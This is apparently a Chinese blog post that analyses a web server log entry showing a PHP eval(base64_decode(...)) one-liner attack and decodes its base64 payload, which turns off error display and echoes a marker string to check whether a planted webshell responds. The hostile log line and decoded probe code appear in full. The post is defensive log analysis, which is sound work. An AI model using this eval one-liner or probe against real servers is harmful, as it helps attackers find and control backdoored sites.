首页 > linux > eval恶意代码还原

eval恶意代码还原

2015年10月13日 mood 发表评论阅读评论

查看后台日至看到如下内容:
117.21.176.241 - - [13/Oct/2015:16:14:34 +0800] "POST / HTTP/1.1" "-" 200 53156 lemon=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztwcmludCgiaGFvcmVuIik7O2VjaG8oInw8LSIpO2RpZSgpOw== "-" "-"

这段内容是有人在扫面后台，执行eval一句话攻击，想知道它干什么，base64_decode这个内容。
decode时注意POST里的％要还原回url_encode前的字符。例如，把%2B和%3D用urldecode()函数还原分别是+号和=号

这段代码还原后的内容是：

@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
;print("haoren");
;echo("|<-");
die();

@ini_set("display_errors","0");

@set_time_limit(0);

@set_magic_quotes_runtime(0);

echo("->|");

;print("haoren");

;echo("|<-");

die();

分类: linux 标签:

这几篇文章你可能也喜欢：

评论 (1) Trackbacks (0) 发表评论 Trackback

未来往事

2015年11月26日09:24 | #1

回复 | 引用

学习咯

本文目前尚无任何 trackbacks 和 pingbacks.

您需要安装旧 Java SE 6 运行环境才能打开“PhpStorm” linux命令行下curl方式post页面